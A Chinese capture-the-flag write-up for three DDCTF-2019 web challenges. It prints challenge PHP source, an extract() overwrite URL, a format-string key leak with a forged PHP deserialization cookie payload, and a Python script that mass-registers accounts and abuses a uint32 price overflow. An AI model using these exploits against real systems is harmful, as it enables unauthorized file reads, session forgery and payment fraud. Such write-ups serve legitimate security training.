DDCTF-2019
Web 滴
Web 签到题
Web 大吉大利,今晚吃鸡
1)滴
网址http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09
参数两次base64解码一次ascii解码得到flag.php
观察只有flag.php才显示图片,尝试把index.php按规则编码获取到index的源码
- <?php
- /*
- * https://blog.csdn.net/FengBanLiuYun/article/details/80616607
- * Date: July 4,2018
- */
- error_reporting(E_ALL || ~E_NOTICE);
- header('content-type:text/html;charset=utf-8');
- if(! isset($_GET['jpg']))
- header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
- $file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
- echo '<title>'.$_GET['jpg'].'</title>';
- $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
- echo $file.'</br>';
- $file = str_replace("config","!", $file);
- echo $file.'</br>';
- $txt = base64_encode(file_get_contents($file));
- echo "<img src='data:image/gif;base64,".$txt."'></img>";
- /*
- * Can you find the flag file?
- *
- */
- ?>
访问网址,发现出题人的博客,代码注释里日期2018.7.4找到对应日期的博客
猜测存在vim异常退出留下的文件,尝试访问博客中文件名practice.txt.swp
http://117.51.150.246/practice.txt.swp
得到的线索f1ag!ddctf.php
在开始页面编码f1ag!ddctf.php尝试读取,其中根据上面得到的源码 ‘!’ 被过滤,用config代替
得到源码
- <?php
- include('config.php');
- $k = 'hello';
- extract($_GET);
- if(isset($uid))
- {
- $content=trim(file_get_contents($k));
- if($uid==$content)
- {
- echo $flag;
- }
- else
- {
- echo'hello';
- }
- }
- ?>
其中存在extract覆盖漏洞,直接访问http://117.51.150.246/f1ag!ddctf.php?uid=&k=
得到flag
2)WEB签到题
进入之后无法访问,查看网络传输信息,找到post请求网址为Auth.php猜测为验证登录
尝试ddctf_username=admin发包成功进入,提示请访问:app/fL2XID2i0Cdh.php
访问页面查看到app/Application.php和app/Session.php源码
- url:app/Application.php
- Class Application {
- var $path = '';
- public function response($data, $errMsg = 'success') {
- $ret = ['errMsg' => $errMsg,
- 'data' => $data];
- $ret = json_encode($ret);
- header('Content-type: application/json');
- echo $ret;
- }
- public function auth() {
- $DIDICTF_ADMIN = 'admin';
- if(!empty($_SERVER['HTTP_DIDICTF_USERNAME']) && $_SERVER['HTTP_DIDICTF_USERNAME'] == $DIDICTF_ADMIN) {
- $this->response('您当前当前权限为管理员----请访问:app/fL2XID2i0Cdh.php');
- return TRUE;
- }else{
- $this->response('抱歉,您没有登陆权限,请获取权限后访问-----','error');
- exit();
- }
- }
- private function sanitizepath($path) {
- $path = trim($path);
- $path=str_replace('../','',$path);
- $path=str_replace('..\\','',$path);
- return $path;
- }
- public function __destruct() {
- if(empty($this->path)) {
- exit();
- }else{
- $path = $this->sanitizepath($this->path);
- if(strlen($path) !== 18) {
- exit();
- }
- $this->response($data=file_get_contents($path),'Congratulations');
- }
- exit();
- }
- }
其中看到Application类中的path参数在魔术方法__destruct()中被调用,并对path进行了一些限制
其中还有危险函数file_get_contents可能用于读取目的文件
猜测可能存在反序列化漏洞
- url:app/Session.php
- include 'Application.php';
- class Session extends Application {
- //key建议为8位字符串
- var $eancrykey = '';
- var $cookie_expiration = 7200;
- var $cookie_name = 'ddctf_id';
- var $cookie_path = '';
- var $cookie_domain = '';
- var $cookie_secure = FALSE;
- var $activity = "DiDiCTF";
- public function index()
- {
- if(parent::auth()) {
- $this->get_key();
- if($this->session_read()) {
- $data = 'DiDI Welcome you %s';
- $data = sprintf($data,$_SERVER['HTTP_USER_AGENT']);
- parent::response($data,'sucess');
- }else{
- $this->session_create();
- $data = 'DiDI Welcome you';
- parent::response($data,'sucess');
- }
- }
- }
- private function get_key() {
- //eancrykey and flag under the folder
- $this->eancrykey = file_get_contents('../config/key.txt');
- }
- public function session_read() {
- if(empty($_COOKIE)) {
- return FALSE;
- }
- $session = $_COOKIE[$this->cookie_name];
- if(!isset($session)) {
- parent::response("session not found",'error');
- return FALSE;
- }
- $hash = substr($session,strlen($session)-32);
- $session = substr($session,0,strlen($session)-32);
- if($hash !== md5($this->eancrykey.$session)) {
- parent::response("the cookie data not match",'error');
- return FALSE;
- }
- $session = unserialize($session);
- if(!is_array($session) OR !isset($session['session_id']) OR !isset($session['ip_address']) OR !isset($session['user_agent'])){
- return FALSE;
- }
- if(!empty($_POST["nickname"])) {
- $arr = array($_POST["nickname"],$this->eancrykey);
- $data = "Welcome my friend %s";
- foreach ($arr as $k => $v) {
- $data = sprintf($data,$v);
- }
- parent::response($data,"Welcome");
- }
- if($session['ip_address'] != $_SERVER['REMOTE_ADDR']) {
- parent::response('the ip addree not match'.'error');
- return FALSE;
- }
- if($session['user_agent'] != $_SERVER['HTTP_USER_AGENT']) {
- parent::response('the user agent not match','error');
- return FALSE;
- }
- return TRUE;
- }
- private function session_create() {
- $sessionid = '';
- while(strlen($sessionid) < 32) {
- $sessionid .= mt_rand(0,mt_getrandmax());
- }
- $userdata = array(
- 'session_id' => md5(uniqid($sessionid,TRUE)),
- 'ip_address' => $_SERVER['REMOTE_ADDR'],
- 'user_agent' => $_SERVER['HTTP_USER_AGENT'],
- 'user_data' => '',
- );
- $cookiedata = serialize($userdata);
- $cookiedata = $cookiedata.md5($this->eancrykey.$cookiedata);
- $expire = $this->cookie_expiration + time();
- setcookie(
- $this->cookie_name,
- $cookiedata,
- $expire,
- $this->cookie_path,
- $this->cookie_domain,
- $this->cookie_secure
- );
- }
- }
- $ddctf = new Session();
- $ddctf->index();
57行 $session = unserialize($session); 验证了之前的猜想存在反序列化漏洞
那么就是要构造session并调用Application类赋给path值读取flag文件
35行 提示flag所在路径,猜测'../config/flag.txt'
- private function get_key() {
- //eancrykey and flag under the folder
- $this->eancrykey = file_get_contents('../config/key.txt');
- }
构造的session会经过一些验证,其中主要构造验证hash值
其验证方式为session[-32:] = md5(eancrykey+session[:-32])
即session的后32位是eancrykey与前面所有字符串拼接后的md5值
接下来就是找eancrykey的具体值,注意到 64行
- if(!empty($_POST["nickname"])) {
- $arr = array($_POST["nickname"],$this->eancrykey);
- $data = "Welcome my friend %s";
- foreach ($arr as $k => $v) {
- $data = sprintf($data,$v);
- }
- parent::response($data,"Welcome");
- }
熟悉pwn的话容易看出这里存在格式化字符串漏洞
我们令nickname=%s 然后post
成功打印了eancrykey的值:EzBlrbNS
之后开始构造session,urldecode一下原来的session
再经过反序列化之后添加一个Application类,其中path处限制长度18
并且会把../过滤掉,构造'..././config/flag.txt'恰好满足长度
- <?php
- class Application{
- var $path='..././config/flag.txt';
- }
- $a = new Application();
- $arr = array (
- 'session_id' => '063e9d131dd8777edc6e3e6c87dcac56',
- 'ip_address' => 'x.x.x.x',
- 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
- 'user_data' => '',
- 'payload' => $a,
- );
- $test = serialize($arr);
- $eancrykey= 'EzblrbNS';
- $hash = md5($eancrykey.$test);
- echo $test.$hash;
- ?>
得到
- a:5:{s:10:"session_id";s:32:"063e9d131dd8777edc6e3e6c87dcac56";s:10:"ip_address";s:13:"x.x.x.x";s:10:"user_agent";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0";s:9:"user_data";s:0:"";s:7:"payload";O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}}38b449cd93daf12a3d889a58594ab3d4
经过urlencode提交得到flag
3)大吉大利,今晚吃鸡~
注册登录,显示用户余额100,需要200购买入场卷,直接购买,支付显示余额不足
查看cookie,发现为REVEL_SESSION,推测后台使用golang编写
猜测存在数据溢出,查看go数据类型范围
尝试之后发现为uint32类型,抓包修改金额为4294967296,支付,成功购买
之后需要移除99个对手,注册一个新号同样操作之后填入id与ticket,显示成功移除一名机器人
之后目的就明确了,写脚本注册购买并将id和ticket填入即可
另外,注册页面存在越权漏洞,注册一个帐号,不管是否注册成功都会返回其cookie可用其登录
脚本如下,网上其他师傅的改了一点,学习了
- import requests
- import time
- users={}
- def register(name,pwd='aaaaaaaa'):
- url='http://117.51.147.155:5050/ctf/api/register?name=%s&password=%s' %(name,pwd)
- requests.adapters.DEFAULT_RETRIES = 5
- re=requests.get(url=url)
- re.keep_alive = False
- cookies=re.cookies.get_dict()
- users[cookies['user_name']]=cookies['REVEL_SESSION']
- print cookies['user_name'],cookies['REVEL_SESSION']
- return cookies['user_name'],cookies['REVEL_SESSION']
- def buyticket(name,session):
- url='http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296'
- header={
- 'Cookie': 'user_name=%s; REVEL_SESSION=%s' %(name,session)
- }
- re=requests.get(url=url,headers=header)
- bill_id = re.json()['data'][0]['bill_id']
- print bill_id
- payticket(bill_id,name,session)
- def payticket(bill_id,name,session):
- url='http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id=%s'%(bill_id)
- header={
- 'Cookie': 'user_name=%s; REVEL_SESSION=%s' %(name,session)
- }
- re=requests.get(url=url,headers=header)
- my_id=re.json()["data"][0]["your_id"]
- my_ticket=re.json()["data"][0]["your_ticket"]
- getflag(my_id,my_ticket)
- def getflag(id,ticket):
- url='http://117.51.147.155:5050/ctf/api/remove_robot?id=%s&ticket=%s' %(id,ticket)
- header={
- 'Cookie': 'user_name=%s; REVEL_SESSION=%s' %(MainUser,MainSession)
- }
- re=requests.get(url=url,headers=header)
- print re.text
- if __name__=="__main__":
- MainUser,MainSession=register('MainUser0002')
- buyticket(MainUser,MainSession)
- time.sleep(1.1)
- for i in range(200,205):
- register('AttachUrr%s' %(i))
- time.sleep(0.6)
- for j in users:
- if j!=MainUser:
- buyticket(j,users[j])
- time.sleep(0.6)
DDCTF-2019的更多相关文章
- 刷题记录:[DDCTF 2019]homebrew event loop
目录 刷题记录:[DDCTF 2019]homebrew event loop 知识点 1.逻辑漏洞 2.flask session解密 总结 刷题记录:[DDCTF 2019]homebrew ev ...
- DDCTF 2019 部分WP
WEB 滴~ http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 观察链接可发现jpg的值是文件名转hex再bas ...
- [DDCTF 2019]homebrew event loop
0x00 知识点 逻辑漏洞: 异步处理导致可以先调用增加钻石,再调用计算价钱的.也就是先货后款. eval函数存在注入,可以通过#注释,我们可以传入路由action:eval#;arg1#arg2#a ...
- ddctf2019--web部分writeup
0x00前言 上周五开始的DDCTF 2019,整个比赛有一周,题目整体来说感觉很不错,可惜我太菜了,做了4+1道题,还是要努力吧 0x01 web 滴~ 打开看着url,就像文件包含 文件名1次he ...
- 2019 DDCTF 部分writeup
网上的wp已经很多了,但wp普遍很简略.我尽量写的详细一点. 一.WEB 滴~ 拿到题目后首先右键查看源代码,发现图片是以base64传送的 而且看url发现里面应该是包含了文件名,并且用了某个编码. ...
- 2019年台积电进军AR芯片,将用于下一代iPhone
近日,有报道表示台积电10nm 芯片可怜的收益率可能会对 2017 年多款高端移动设备的推出产生较大的影响,其中自然包括下一代 iPhone 和 iPad 机型.不过,台积电正式驳斥了这一说法,表明1 ...
- VS经常报错的link error 2019
VS经常报错的link error 2019 原因如下: 可能是找得到头文件,但是相关的dll或者lib找不到,需要在配置里面添加相应的库文件. project=>configuration.. ...
- YTU 2019: 鞍点计算
2019: 鞍点计算 时间限制: 1 Sec 内存限制: 64 MB 提交: 66 解决: 30 题目描述 找出具有m行n列二维数组Array的"鞍点",即该位置上的元素在该行 ...
- Windows Server 2019 预览版介绍
在Windows server 2012.Windows server 2016还未完全普及的情况下,昨天Windows Server团队宣布Windows Server 2019将在2018年的下半 ...
- Telerik控件集-2019.R1.SP1.All
Telerik 专注于微软.Net平台的表示层与内容管理控件,提供高度稳定性和丰富性能的组件产品DevCraft,并可应用在非常严格的环境中.Telerik拥有 Microsoft, HP, Alco ...
随机推荐
- Vue.js实现注册功能
编写html,通过vue-resource.js库向后台提交数据 <!DOCTYPE html> <html lang="en"> <head> ...
- Ext.isIterable
Ext.isIterable用于判断传入的参数是否为可迭代的 在这4种情况下,函数返回true 1:数组2:函数参数arguments3:HTML collections : NodeList4:HT ...
- 关于sass与VScode 一些配置 学习记录
VScode三个关于sass的插件 .vscode-Sass------sass/scss文件语法提示.(sublime text也有) .vscode-Easy Sass------scss编译成c ...
- Django 加载 app 中的urls
在 blog app 下创建 urls.py, 定义该 app 下自有的 url : new/story from blog import views from django.conf import ...
- ubuntu server 16.04 开启root密码登录
0x00 ubuntu server 16.04 开启root密码登录 由于众多VPS默认使用证书验证登录,虽然安全但使用十分不便,所以特提供开启root用户并使用密码登录方法. 0x01 为root ...
- 工具资源系列之给虚拟机装个windows
前面我们介绍了如何在 mac 宿主机安装 VMware 虚拟机软件,本节我们将继续介绍如何给虚拟机安装镜像,切换不同的操作系统. VMware 软件是容器,镜像是内核,这里的镜像指的是操作系统. 下载 ...
- 通过maven profile 打包指定环境配置
背景 最近换了个新公司接手了一个老项目,然后比较坑的是这个公司的项目都没有没有做多环境打包配置,每次发布一个环境都要手动的去修改配置文件.今天正好有空就来配置下. 解决这个问题的方式有很多,我这里挑选 ...
- Java通过JDBC连接数据库的三种方式!!!并对数据库实现增删改查
前言 java连接数据库完整流程为: 1,获得驱动(driver),数据库连接(url),用户名(username),密码(password)基本信息的三种方式. 2,通过获得的信息完成JDBC实现连 ...
- 分布式缓存Redis集群配置使用
Redis 简介 redis是一种开源的.基于内存的.可持久化的.高性能的Key-Value数据存储系统. redis能做什么? 持久化存储 高速缓存 消息中间件 ...
- 在xp下无人值守自动安装系统
无人值守安装可以大大缩短安装系统的时间.我在虚拟机测试成功. 先给文件链接https://files.cnblogs.com/files/sishenzaixian/%E8%87%AA%E5%8A%A ...